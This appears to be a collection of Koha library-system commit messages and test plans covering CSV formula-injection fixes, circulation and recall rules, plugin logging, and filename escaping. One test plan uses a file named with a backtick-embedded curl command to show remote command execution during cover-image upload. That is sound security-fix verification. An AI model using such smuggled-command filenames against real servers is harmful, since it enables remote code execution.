This patch adds formula=empty to:
- Koha::ERM::EUsage::SushiCounter::_build_COUNTER_report_file()
Updated 2024-09-26: Earlier version also removed unnecessary
use of formula=empty from two places.

The system is vulnerable to Formula Injection attacks as the data
stored within the database and exported as CSV/Excel is not being
sanitized or validated against implanted formula payloads
This patch modifies all uses of Text::CSV and derived classes to pass
the "formula" parameter with value of "empty" which replaces formulas
by empty string.
Test Plan:
1) Apply this patch
2) For guided_reports.pl, attempt to export CSV where you've set a column to a formula somehow
( such as "=1+3" )
3) Export that CSV file
4) Note the formula has not been exported
5) Repeat this plan for the remaining scripts that export CSV files
where users can define the outputted data

Fixed two conflicts. I have tested that this works as advertised on:
- Reports (Download > Comma separated text (.csv)) [Text::CSV::Encoded]
- Circulation > Overdues > Download file of all overdues [Text::CSV_XS]
- misc/export_borrowers.pl [Text::CSV]
This covers all modules used, and both GUI and command line.

And update the first conditional logic.
This patch aims to maintain the logic behind the first patch, but restore get_effective_rule.
get_effective_rule_value is using cache and I believe that is the reason why Items.t fail when using that.
Test plan:
1) Search for 'music' on OPAC
2) Notice records have the 'place hold' link
3) Visit circulation rules on Staff:
<staff_url>/cgi-bin/koha/admin/smart-rules.pl
4) On 'Default checkout, hold and return policy' , under 'Hold policy' pick 'From any library'. Hit 'Save'.
5) Repeat 1). Notice the 'place hold' link is gone.
6) Apply patch. restart plack. Repeat 1). Notice the 'place hold' is shown again

It was noted on Bug 29087 that the value of circulation rules needs to be checked differently, so this follow-up addresses that.
To test:
1. Apply patch and restart services
2. Search for a record on the OPAC. Confirm you can see a link to place a hold.
3. Search for this record on the staff interface and place a hold. Go to Circulation -> Holds to pull and confirm your hold shows in the list.
4. Confirm tests still pass t/db_dependent/Koha/Holds.t

If an item is due sooner than the recall due date interval then placing
a recall on it can inadvertently extend the book's due date, possibly
causing the recalling patron to receive the item later than they would
otherwise.
Test plan:
=========
1. Turn on recalls with UseRecalls.
2. In circulation rules, set the recall due date interval to 7 days
or any other arbitrary period.
3. Check out an item to one patron & set the due date to be before the
recall due date interval will have elapsed (e.g. the next day)
4. As a second patron, place a recall on the item in question.
5. See that the item's due date is extended to the current date plus
the recalls due date interval.
6. Apply the patch, restart_all;
7. Repeat steps 3. and 4. See that the due date has not been extended.
BTW, the calculation of $due_interval has been changed, because with
the current code and empty 'Recall due date interval' $due_interval
is undefined, despite the intention of the author of the code.
(after calling get_effective_rule $recall_due_date_interval is defined, but
$recall_due_date_interval->rule_value is undefined; the patron gets
a message: '... return the item within days, by ...' - no days count).

The subroutine libraries_where_can_see_things stores the list of libraries that things
can be viewed from in an internal variable, so we can return this directly if we have already calculated.
When returning if not cached, we dereference the list and return an array. If cached, we are returning
an arrayref. This patch simply ensures we dereference the array even if already cached.
Before this patch, we were fetching the patrons, then redacting all info as their branches didn't match against
an arrayref, rather than checking against each branch we are allowed to view.
To test:
1. Setup a library group and check the "Limit patron data access by group ." option.
2. Add some libraries to the group. ( IN k-t-d I added CPL and MPL )
3. Create a staff account who has staff access permissions and all of the borrower permissions except "view_borrower_infos_from_any_libraries"
4. Set the home library of that staff member to one of the branches in step 2. ( In my test I choose MPL )
5. Log in as that patron and attempt a patron search that would include users from either library in step 2.
6. See the error:
Something went wrong when loading the table.

Three routines in Plugins got the verbose parameter on 35507.
We can refine this a bit further.
The idea here is report when you are installing plugins but not
report when just calling plugins (flooding logs).
[1] GetPlugins: Most callers do not expect (or check) results for
failing plugins. This patch makes GetPlugins only return
errors when passing the *errors* flag (in 2 cases).
[a] The misc/devel script prints warnings now using verbose,
so does not need the errors flag anymore.
[b] plugins/plugins-home is the only case left. Tiny adjustment
to keep current behavior. Fixed colspan in template.
Does not need verbose in favor of 'errors' (passed to
template).
[c] For most calls we do not want verbose. New default is 0.
[2] InstallPlugins
[a] Disabled verbose in plugin-upload. Not really needed.
Added a FIXME; we need to improve individual install.
[b] misc/devel: No warnings anymore when calling InstallPlugins
after GetPlugins.
[3] get_enabled_plugins
[a] Plugins->call does not need verbose.
[b] Plugins->feature_enabled does not need it too.
Test plan:
[1] See previous plan. With TestMR data but without patch, run
misc script and go to plugins-home. Do you see load errors on
commandline or form?
[2] Run plugins/plugins-upload (uploading just some file is good
enough); verify that you do not see TestMR lines in logfile.
[3] Run t/db_dependent/Koha/Plugins/Plugins.t for the additional
test on verbose and errors flag.

I'm not 100% happy with this but I'm out of ideas.
I think the problem warning happens because there is no method status or status_alias directly defined in Object.pm so it tries to define it, but it has already been defined by AUTOLOAD previously.
Test plan:
prove t/db_dependent/Koha/Illbackend.t

This removes the MySQLism for FIELD(..).
In this case we just want to get the non-default records in
the front. So we can just test lang=default. And prevent inserting
$lang in the expression. And so prevent execution in ORDER BY.
No longer needing the ->quote call too.
Test plan:
Run Koha/AdditionalContents.t again.

To test:
1/ create a file named something like 'execute`curl blog.bigballofwax.co.nz`.zip'
Where the domain is one you can watch the logs from
2/ Upload this file as a cover image
3/ Check /var/lib/koha/sitename/tmp/koha_sitename/ and see unescaped filenames
4/ Choose process, check the logs of the webserver see the connection has been made
5/ Apply the patch
5/ Repeat 2 & 3 and see the filename is now escaped
6/ Choose process and check no errors but no no remote execution occurs
7/ Test uploading actual zip file and images still works

This patch adds support for messages generated using non-html formatted
notice templates to the html_content method of Koha::Notice::Message.
We continue to wrap content for html generated messages with the
appropriate headers, css and title.
For non-html generated content we wrap in the <div style="white-space:
pre-wrap"> block to maintain text formatting as defined in the original
plaintext template.
Test
Follow the test plan for bug 30287, nothing should outwardly change.
